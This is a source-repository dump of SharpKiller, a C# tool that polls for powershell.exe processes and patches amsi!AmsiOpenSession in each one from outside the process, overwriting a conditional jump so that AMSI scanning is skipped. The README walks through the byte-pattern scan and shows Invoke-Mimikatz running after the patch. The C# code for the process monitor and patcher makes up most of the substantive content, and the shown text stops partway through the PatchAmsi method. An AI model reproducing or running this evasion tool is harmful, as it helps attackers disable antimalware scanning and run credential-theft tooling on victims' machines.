├── obj ├── x64 │ ├── Release │ │ ├── Sharp-Killer.csproj.FileListAbsolute.txt │ │ └── .NETFramework,Version=v4.8.AssemblyAttributes.cs │ └── Debug │ │ ├── Sharp-Killer.csproj.SuggestedBindingRedirects.cache │ │ ├── Sharp-Killer.csproj.CoreCompileInputs.cache │ │ ├── Sharp-Killer.exe │ │ ├── Sharp-Killer.pdb │ │ ├── DesignTimeResolveAssemblyReferences.cache │ │ ├── Sharp-Killer.csproj.AssemblyReference.cache │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ ├── .NETFramework,Version=v4.8.AssemblyAttributes.cs │ │ └── Sharp-Killer.csproj.FileListAbsolute.txt ├── Debug │ ├── Sharp-Killer.csproj.SuggestedBindingRedirects.cache │ ├── Sharp-Killer.csproj.CoreCompileInputs.cache │ ├── Sharp-Killer.exe │ ├── Sharp-Killer.pdb │ ├── DesignTimeResolveAssemblyReferences.cache │ ├── Sharp-Killer.csproj.AssemblyReference.cache │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── .NETFramework,Version=v4.8.AssemblyAttributes.cs │ └── Sharp-Killer.csproj.FileListAbsolute.txt └── Release │ ├── Sharp-Killer.csproj.AssemblyReference.cache │ └── .NETFramework,Version=v4.8.AssemblyAttributes.cs ├── bin └── Debug │ ├── Sharp-Killer.exe │ ├── Sharp-Killer.pdb │ └── Sharp-Killer.exe.config ├── App.config ├── Sharp-Killer.csproj.user ├── Program.cs ├── Sharp-Killer.sln ├── Properties └── AssemblyInfo.cs ├── README.md ├── Sharp-Killer.csproj └── AMSIPatcher.cs /obj/x64/Release/Sharp-Killer.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /obj/Debug/Sharp-Killer.csproj.SuggestedBindingRedirects.cache: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /obj/x64/Debug/Sharp-Killer.csproj.SuggestedBindingRedirects.cache: -------------------------------------------------------------------------------- 1 | 
-------------------------------------------------------------------------------- /obj/Debug/Sharp-Killer.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | af2683cf6546755c96c0e93826a25891e7c5c33b 2 | -------------------------------------------------------------------------------- /obj/x64/Debug/Sharp-Killer.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 3c6d6a03a5196a30c8672509de8009f97e28abb3 2 | -------------------------------------------------------------------------------- /bin/Debug/Sharp-Killer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/bin/Debug/Sharp-Killer.exe -------------------------------------------------------------------------------- /bin/Debug/Sharp-Killer.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/bin/Debug/Sharp-Killer.pdb -------------------------------------------------------------------------------- /obj/Debug/Sharp-Killer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/Debug/Sharp-Killer.exe -------------------------------------------------------------------------------- /obj/Debug/Sharp-Killer.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/Debug/Sharp-Killer.pdb -------------------------------------------------------------------------------- /obj/x64/Debug/Sharp-Killer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/x64/Debug/Sharp-Killer.exe 
-------------------------------------------------------------------------------- /obj/x64/Debug/Sharp-Killer.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/x64/Debug/Sharp-Killer.pdb -------------------------------------------------------------------------------- /obj/Debug/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/Debug/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /obj/Debug/Sharp-Killer.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/Debug/Sharp-Killer.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /obj/Release/Sharp-Killer.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/Release/Sharp-Killer.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /obj/x64/Debug/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/x64/Debug/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache 
-------------------------------------------------------------------------------- /obj/x64/Debug/Sharp-Killer.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/x64/Debug/Sharp-Killer.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ar0x4/SharpKiller/HEAD/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /bin/Debug/Sharp-Killer.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /obj/Debug/.NETFramework,Version=v4.8.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName = ".NET Framework 4.8")] 5 | -------------------------------------------------------------------------------- /obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName = ".NET Framework 4.8")] 5 | 
-------------------------------------------------------------------------------- /obj/x64/Debug/.NETFramework,Version=v4.8.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName = ".NET Framework 4.8")] 5 | -------------------------------------------------------------------------------- /obj/x64/Release/.NETFramework,Version=v4.8.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName = ".NET Framework 4.8")] 5 | -------------------------------------------------------------------------------- /Sharp-Killer.csproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | publish\ 5 | 6 | 7 | 8 | 9 | 10 | de-DE 11 | false 12 | 13 | -------------------------------------------------------------------------------- /Program.cs: --------------------------------------------------------------------------------
using System;
using System.Diagnostics;
using System.Threading;
using System.Threading.Tasks;

namespace Sharp_Killer
{
    /// <summary>
    /// Console entry point. Polls every 500 ms for running "powershell" processes and hands
    /// each poll to <see cref="AMSIPatcher.PatchAllPowershells"/>, which does the actual
    /// cross-process patch. Typing "exit" on stdin stops the loop.
    /// </summary>
    internal class Program
    {
        /// <param name="args">Unused; there is no command-line configuration.</param>
        public static void Main(string[] args)
        {
            // Friendly process name without ".exe", as Process.GetProcessesByName expects.
            // Only "powershell" (Windows PowerShell) is watched; pwsh (PowerShell 7) is not.
            string processNameToMonitor = "powershell";

            Console.WriteLine($"Monitoring for Powershell.exe");

            AMSIPatcher amsiPatcher = new AMSIPatcher();
            CancellationTokenSource cancellationTokenSource = new CancellationTokenSource();

            // Terminate the program when the user types 'exit'.
            // NOTE(review): Console.ReadLine returns null once stdin is closed or redirected to EOF.
            // The null check avoids a NullReferenceException, but the loop then keeps calling
            // ReadLine without ever cancelling, so the process cannot be stopped via stdin in that case.
            Task.Run(() =>
            {
                while (true)
                {
                    string userInput = Console.ReadLine();
                    if (userInput != null && userInput.Trim().Equals("exit", StringComparison.OrdinalIgnoreCase))
                    {
                        cancellationTokenSource.Cancel();
                        break;
                    }
                }
            });

            // Poll loop. The token is only checked after a pass, so "exit" takes effect within
            // roughly one sleep interval.
            while (true)
            {
                // Managed pre-check only; the Toolhelp walk inside PatchAllPowershells does the real
                // matching (on the image name "powershell.exe") and is skipped when nothing is running.
                // NOTE(review): the Process objects returned here are never disposed, so each poll
                // leaves them for the finalizer to clean up.
                Process[] processes = Process.GetProcessesByName(processNameToMonitor);
                if (processes.Length > 0)
                    amsiPatcher.PatchAllPowershells();
                if (cancellationTokenSource.Token.IsCancellationRequested)
                    break;
                Thread.Sleep(500);
            }
        }
    }
}
-------------------------------------------------------------------------------- /Sharp-Killer.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.6.33815.320 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Sharp-Killer", "Sharp-Killer.csproj", "{4DD3206C-F14A-43A3-8EA8-88676810B8CD}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Release|Any CPU = Release|Any CPU 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {4DD3206C-F14A-43A3-8EA8-88676810B8CD}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {4DD3206C-F14A-43A3-8EA8-88676810B8CD}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {4DD3206C-F14A-43A3-8EA8-88676810B8CD}.Debug|x64.ActiveCfg = Debug|x64 19 | {4DD3206C-F14A-43A3-8EA8-88676810B8CD}.Debug|x64.Build.0 = Debug|x64 20 | {4DD3206C-F14A-43A3-8EA8-88676810B8CD}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {4DD3206C-F14A-43A3-8EA8-88676810B8CD}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {4DD3206C-F14A-43A3-8EA8-88676810B8CD}.Release|x64.ActiveCfg = Release|x64 23 | {4DD3206C-F14A-43A3-8EA8-88676810B8CD}.Release|x64.Build.0 = Release|x64 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 |
HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {ED52B0E4-08ED-45AE-8D05-4402B50C6624} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /Properties/AssemblyInfo.cs: --------------------------------------------------------------------------------
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// General information about an assembly is controlled through the following
// attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("Sharp-Killer")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Sharp-Killer")]
[assembly: AssemblyCopyright("Copyright © 2023")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM.
// It is the same GUID the .sln/.csproj use as the project GUID.
[assembly: Guid("4dd3206c-f14a-43a3-8ea8-88676810b8cd")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
-------------------------------------------------------------------------------- /obj/Debug/Sharp-Killer.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\bin\Debug\Sharp-Killer.exe.config 2 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\bin\Debug\Sharp-Killer.exe 3 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\bin\Debug\Sharp-Killer.pdb 4 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\obj\Debug\Sharp-Killer.csproj.AssemblyReference.cache 5 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\obj\Debug\Sharp-Killer.csproj.SuggestedBindingRedirects.cache 6 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\obj\Debug\Sharp-Killer.csproj.CoreCompileInputs.cache 7 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\obj\Debug\Sharp-Killer.exe 8 |
C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\obj\Debug\Sharp-Killer.pdb 9 | C:\Users\HTB\Desktop\Projects\SharpKiller\bin\Debug\Sharp-Killer.exe.config 10 | C:\Users\HTB\Desktop\Projects\SharpKiller\bin\Debug\Sharp-Killer.exe 11 | C:\Users\HTB\Desktop\Projects\SharpKiller\bin\Debug\Sharp-Killer.pdb 12 | C:\Users\HTB\Desktop\Projects\SharpKiller\obj\Debug\Sharp-Killer.csproj.AssemblyReference.cache 13 | C:\Users\HTB\Desktop\Projects\SharpKiller\obj\Debug\Sharp-Killer.csproj.SuggestedBindingRedirects.cache 14 | C:\Users\HTB\Desktop\Projects\SharpKiller\obj\Debug\Sharp-Killer.csproj.CoreCompileInputs.cache 15 | C:\Users\HTB\Desktop\Projects\SharpKiller\obj\Debug\Sharp-Killer.exe 16 | C:\Users\HTB\Desktop\Projects\SharpKiller\obj\Debug\Sharp-Killer.pdb 17 | -------------------------------------------------------------------------------- /obj/x64/Debug/Sharp-Killer.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\bin\x64\Debug\Sharp-Killer.exe.config 2 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\bin\x64\Debug\Sharp-Killer.exe 3 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\bin\x64\Debug\Sharp-Killer.pdb 4 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\obj\x64\Debug\Sharp-Killer.csproj.AssemblyReference.cache 5 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\obj\x64\Debug\Sharp-Killer.csproj.SuggestedBindingRedirects.cache 6 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 
0x04\Sharp-Killer\obj\x64\Debug\Sharp-Killer.csproj.CoreCompileInputs.cache 7 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\obj\x64\Debug\Sharp-Killer.exe 8 | C:\Users\mbzra\source\repos\Schulung\CreateProcessDemo-Schulung- Mitigation Block Policies- 0x04\Sharp-Killer\obj\x64\Debug\Sharp-Killer.pdb 9 | C:\Users\mbzra\source\repos\SharpKiller\Sharp-Killer\bin\x64\Debug\Sharp-Killer.exe.config 10 | C:\Users\mbzra\source\repos\SharpKiller\Sharp-Killer\bin\x64\Debug\Sharp-Killer.exe 11 | C:\Users\mbzra\source\repos\SharpKiller\Sharp-Killer\bin\x64\Debug\Sharp-Killer.pdb 12 | C:\Users\mbzra\source\repos\SharpKiller\Sharp-Killer\obj\x64\Debug\Sharp-Killer.csproj.AssemblyReference.cache 13 | C:\Users\mbzra\source\repos\SharpKiller\Sharp-Killer\obj\x64\Debug\Sharp-Killer.csproj.SuggestedBindingRedirects.cache 14 | C:\Users\mbzra\source\repos\SharpKiller\Sharp-Killer\obj\x64\Debug\Sharp-Killer.csproj.CoreCompileInputs.cache 15 | C:\Users\mbzra\source\repos\SharpKiller\Sharp-Killer\obj\x64\Debug\Sharp-Killer.exe 16 | C:\Users\mbzra\source\repos\SharpKiller\Sharp-Killer\obj\x64\Debug\Sharp-Killer.pdb 17 | -------------------------------------------------------------------------------- /README.md: --------------------------------------------------------------------------------
*This is only a fork of the SharpKiller project; the main repo is at https://github.com/S1lkys/SharpKiller.*

# SharpKiller
A port of the "lifetime" AMSI bypass AMSI-Killer by @ZeroMemoryEx to .NET Framework 4.8. It patches `AmsiOpenSession` inside already-running `powershell.exe` processes from a separate process (via `ReadProcessMemory`/`WriteProcessMemory`), rather than from inside the PowerShell process itself.

Newly integrated features:

[ x ] - Live scan for new `powershell.exe` processes every 0.5 seconds -> automatically patches each new powershell instance. Only processes whose image name is exactly `powershell.exe` are matched; `pwsh.exe` (PowerShell 7) is not.

## Opcode Scan

* We locate the `je` to patch by scanning the first 1024 bytes of `AmsiOpenSession` (read out of the target process) for a byte pattern in which only the first byte of each instruction is fixed and the remaining bytes are wildcards (`'?'`). Because the displacement and jump-offset bytes are wildcarded, the pattern keeps matching across amsi.dll updates as long as the instruction sequence itself (`test`/`je`/`test`/`je`) is unchanged; a build that reorders or replaces those instructions will defeat it.

* For example:

` | 48:85D2 | test rdx, rdx |`

` | 74 3F | je amsi.7FFAE957C694 |`

` | 48 : 85C9 | test rcx, rcx |`

` | 74 3A | je amsi.7FFAE957C694 |`

` | 48 : 8379 08 00 | cmp qword ptr ds : [rcx + 8] , 0 |`

` | 74 33 | je amsi.7FFAE957C694 |`

* The search pattern from the original AMSI-Killer looks like this:

`{ 0x48,'?','?', 0x74,'?',0x48,'?' ,'?' ,0x74,'?' ,0x48,'?' ,'?' ,'?' ,'?',0x74,0x33}`

* Note that the pattern actually used in this port's `AMSIPatcher.cs` is the shorter prefix `{ 0x48,'?','?',0x74,'?',0x48,'?','?',0x74 }` (the first two `test`/`je` pairs only). The match offset is then advanced by 3 bytes to skip the 3-byte `test rdx, rdx` and land on the opcode of the first `je`.


![image](https://user-images.githubusercontent.com/60795188/221431685-60fb2012-db0f-41aa-bd7b-3a19f07c91c4.png)


# Patch

## Before Patch

* `test rdx, rdx` ANDs RDX with itself and sets ZF when the register is zero. If ZF is set, the following `je` jumps to the function's return path; otherwise execution falls through to the next check.

![image](https://user-images.githubusercontent.com/60795188/221431975-73c78c9c-5358-44c2-b0de-41d68024e2bb.png)

* AMSI flags the script, so we can't run `Invoke-Mimikatz`:

![image](https://user-images.githubusercontent.com/60795188/221432132-20993ccf-c53e-493d-8b22-feaea86fb6bf.png)

## After Patch


* We overwrite the first byte of that `je` (opcode `0x74`) with `0xEB`, turning it into an unconditional short `jmp` to the same target, so `AmsiOpenSession` always takes the early-return path regardless of its arguments. The rel8 displacement byte is left untouched.

![Screenshot 2023-02-26 195848](https://user-images.githubusercontent.com/60795188/221444031-5b8c365f-cb38-4ce4-89b5-153ecc12208d.png)

![image](https://user-images.githubusercontent.com/60795188/221432418-841db688-879c-4915-8d6e-926236a3732c.png)

* With the patch applied, `Invoke-Mimikatz` runs:

![Screenshot 2023-02-26 195914](https://user-images.githubusercontent.com/60795188/221432425-5c121433-33f4-4b8d-add6-63c078d5edb8.png)





References:
https://github.com/ZeroMemoryEx/Amsi-Killer
-------------------------------------------------------------------------------- /Sharp-Killer.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3
| 4 | 5 | Debug 6 | AnyCPU 7 | {4DD3206C-F14A-43A3-8EA8-88676810B8CD} 8 | Exe 9 | Sharp_Killer 10 | Sharp-Killer 11 | v4.8 12 | 512 13 | true 14 | true 15 | publish\ 16 | true 17 | Disk 18 | false 19 | Foreground 20 | 7 21 | Days 22 | false 23 | false 24 | true 25 | 0 26 | 1.0.0.%2a 27 | false 28 | false 29 | true 30 | 31 | 32 | AnyCPU 33 | true 34 | full 35 | false 36 | bin\Debug\ 37 | DEBUG;TRACE 38 | prompt 39 | 4 40 | 41 | 42 | AnyCPU 43 | pdbonly 44 | true 45 | bin\Release\ 46 | TRACE 47 | prompt 48 | 4 49 | 50 | 51 | true 52 | bin\x64\Debug\ 53 | DEBUG;TRACE 54 | full 55 | x64 56 | 7.3 57 | prompt 58 | true 59 | 60 | 61 | bin\x64\Release\ 62 | TRACE 63 | true 64 | pdbonly 65 | x64 66 | 7.3 67 | prompt 68 | true 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | False 92 | Microsoft .NET Framework 4.8 %28x86 und x64%29 93 | true 94 | 95 | 96 | False 97 | .NET Framework 3.5 SP1 98 | false 99 | 100 | 101 | 102 | -------------------------------------------------------------------------------- /AMSIPatcher.cs: --------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;

namespace Sharp_Killer
{
    /// <summary>
    /// Cross-process AMSI patcher. For each target PID it reads the start of
    /// amsi!AmsiOpenSession out of the target, pattern-matches the test/je prologue and
    /// overwrites the first je opcode with a short jmp (0xEB). Everything is done through
    /// kernel32 P/Invokes (OpenProcess / ReadProcessMemory / WriteProcessMemory); no code is
    /// injected into or executed inside the target. The observable footprint is therefore a
    /// foreign process writing into the image-backed code page of amsi.dll in the target.
    /// </summary>
    public class AMSIPatcher
    {
        // SetLastError is not requested here, so Marshal.GetLastWin32Error() would be
        // meaningless after a failed write.
        [DllImport("kernel32.dll")]
        static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, ref int lpNumberOfBytesWritten);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [Out] byte[] lpBuffer, int dwSize, out IntPtr lpNumberOfBytesRead);

        // Returns IntPtr.Zero on failure (never null — IntPtr is a value type).
        [DllImport("kernel32.dll")]
        static extern IntPtr OpenProcess(UInt32 dwDesiredAccess, bool bInheritHandle, UInt32 dwProcessId);

        [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
        static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

        [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        internal static extern IntPtr LoadLibrary(string lpFileName);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern IntPtr CreateToolhelp32Snapshot(SnapshotFlags dwFlags, uint th32ProcessID);

        // No CharSet given, so these bind to the ANSI Process32First/Next, matching the
        // ANSI marshalling of PROCESSENTRY32.szExeFile below.
        [DllImport("kernel32.dll")]
        static extern bool Process32First(IntPtr hSnapshot, ref PROCESSENTRY32 lppe);

        [DllImport("kernel32.dll")]
        static extern bool Process32Next(IntPtr hSnapshot, ref PROCESSENTRY32 lppe);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool CloseHandle(IntPtr hObject);

        // PIDs that have already produced a "[+] AMSI Patched" line. Note this only gates the
        // console output in PatchAllPowershells, not the patch call itself.
        // NOTE(review): the generic type argument was lost in extraction; Add/Contains on an int
        // imply List<int>.
        static List alreadyPatched = new List();

        // Toolhelp PROCESSENTRY32 (ANSI layout; szExeFile is a fixed 260-char buffer).
        [StructLayout(LayoutKind.Sequential)]
        struct PROCESSENTRY32
        {
            public uint dwSize;
            public uint cntUsage;
            public uint th32ProcessID;
            public IntPtr th32DefaultHeapID;
            public uint th32ModuleID;
            public uint cntThreads;
            public uint th32ParentProcessID;
            public int pcPriClassBase;
            public uint dwFlags;
            [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 260)]
            public string szExeFile;
        };

        // TH32CS_* flags for CreateToolhelp32Snapshot; only Process is used in this file.
        [Flags]
        enum SnapshotFlags : uint
        {
            HeapList = 0x00000001,
            Process = 0x00000002,
            Thread = 0x00000004,
            Module = 0x00000008,
            Module32 = 0x00000010,
            Inherit = 0x80000000,
            All = 0x0000001F
        }

        // Unused in this file: no VirtualAllocEx / VirtualProtectEx is imported.
        private enum State
        {
            MEM_COMMIT = 0x00001000,
            MEM_RESERVE = 0x00002000
        }

        // Unused in this file (see note on the WriteProcessMemory call in PatchAmsi).
        private static readonly UInt32 MEM_COMMIT = 0x1000;
        private static readonly UInt32 MEM_RESERVE = 0x2000;
        private static readonly UInt32 PAGE_EXECUTE_READ = 0x20;
        private static readonly UInt32 PAGE_READWRITE = 0x04;
        private static readonly UInt32 PAGE_EXECUTE_READWRITE = 0x40;

        // OpenProcess access rights. Only VM_OPERATION | VM_READ | VM_WRITE are requested by
        // PatchAmsi; ALL_ACCESS / CREATE_THREAD / QUERY_INFORMATION are declared but unused.
        private enum Process_access
        {
            PROCESS_ALL_ACCESS = 0x000F0000 | 0x00100000 | 0xFFFF,
            PROCESS_CREATE_THREAD = 0x0002,
            PROCESS_QUERY_INFORMATION = 0x0400,
            PROCESS_VM_OPERATION = 0x0008,
            PROCESS_VM_READ = 0x0010,
            PROCESS_VM_WRITE = 0x0020
        }

        // Compared against a truncated IntPtr in PatchAllPowershells (see note there).
        private const UInt32 INVALID_HANDLE_VALUE = 0xffffffff;

        // Prologue of amsi!AmsiOpenSession that the pattern below is derived from. The three
        // "je" all go to the same early-return label; the first one is the patch target.
        //00007FFAE957C650 | 48:85D2 | test rdx, rdx |
        //00007FFAE957C653 | 74 3F | je amsi.7FFAE957C694 |
        //00007FFAE957C655 | 48 : 85C9 | test rcx, rcx |
        //00007FFAE957C658 | 74 3A | je amsi.7FFAE957C694 |
        //00007FFAE957C65A | 48 : 8379 08 00 | cmp qword ptr ds : [rcx + 8] , 0 |
        //00007FFAE957C65F | 74 33 | je amsi.7FFAE957C694 |

        // 0xEB = short JMP rel8. It is written over the 0x74 (JE rel8) opcode only; the rel8
        // displacement byte that follows is left as-is, so the jump target does not change and
        // the conditional early return becomes unconditional.
        private byte[] patch = new byte[1] { 0xEB };

        /// <summary>
        /// Searches <paramref name="startAddress"/> (the bytes read out of the target's
        /// AmsiOpenSession) for <paramref name="pattern"/>, where a <c>'?'</c> entry matches any
        /// byte. Bytes are compared via their decimal <c>ToString()</c> form, which is why an
        /// <c>int</c> literal such as <c>0x48</c> and a <c>byte</c> value 0x48 compare equal ("72").
        /// </summary>
        /// <param name="startAddress">Buffer to scan.</param>
        /// <param name="searchSize">Bound used only by the inner (pattern) loop; the outer loop is hard-coded to 1024.</param>
        /// <param name="pattern">Mix of byte values and <c>'?'</c> wildcards (generic argument lost in extraction; presumably a list of object).</param>
        /// <param name="patternSize">Number of entries in <paramref name="pattern"/>.</param>
        /// <returns>
        /// Match offset plus 3 — i.e. the byte after the 3-byte <c>test rdx, rdx</c>, which is the
        /// opcode of the first <c>je</c> — or 1024 (the loop limit) when nothing matched.
        /// </returns>
        private int SearchPattern(byte[] startAddress, Int64 searchSize, List pattern, Int64 patternSize)
        {
            int i = 0;

            // NOTE(review): the outer bound ignores searchSize; a startAddress shorter than 1024
            // bytes would throw IndexOutOfRangeException below.
            while (i < 1024)
            {

                if (startAddress[i].ToString().Equals(pattern[0].ToString()))
                {
                    int j = 1;
                    // Wildcard check runs first, so '?' never reaches the byte comparison.
                    while (j < patternSize && i + j < searchSize && (pattern[j].ToString().Equals("?") || startAddress[i + j].ToString().Equals(pattern[j].ToString())))
                        j++;
                    if (j == patternSize)
                        // +3 skips "48 85 D2" (test rdx, rdx) and lands on the je opcode.
                        return i + 3;
                }
                i++;
            }
            // NOTE(review): a miss returns 1024 rather than a sentinel such as -1; the caller
            // cannot tell the two apart and will write the patch byte at AmsiAddr + 1024.
            return i;
        }

        /// <summary>
        /// Patches AMSI in the process <paramref name="tpid"/> by overwriting the first
        /// <c>je</c> of <c>amsi!AmsiOpenSession</c> with a short <c>jmp</c>.
        /// The address of AmsiOpenSession is resolved in <em>this</em> process (LoadLibrary +
        /// GetProcAddress) and reused as the address in the target, so the patch relies on
        /// amsi.dll being mapped at the same base in both processes and on both being the same
        /// bitness. The bytes that are pattern-matched are read from the target, not from the
        /// local copy.
        /// </summary>
        /// <param name="tpid">Process ID of the target process.</param>
        /// <returns>
        /// -1 if any step failed, 0 otherwise. 0 only means WriteProcessMemory returned true;
        /// it does not mean the pattern was found (see note on matchAddress).
        /// </returns>
        private int PatchAmsi(int tpid)
        {
            // Shorter than the README's pattern: only the first two test/je pairs.
            List pattern = new List() { 0x48, '?', '?', 0x74, '?', 0x48, '?', '?', 0x74 };

            int patternSize = pattern.Count;
            if (tpid == 0)
                return -1;

            // VM_OPERATION | VM_READ | VM_WRITE is the minimum RPM/WPM need; the constant int
            // expression converts implicitly to the UInt32 parameter.
            // Opening a process of another user or higher integrity will presumably fail here
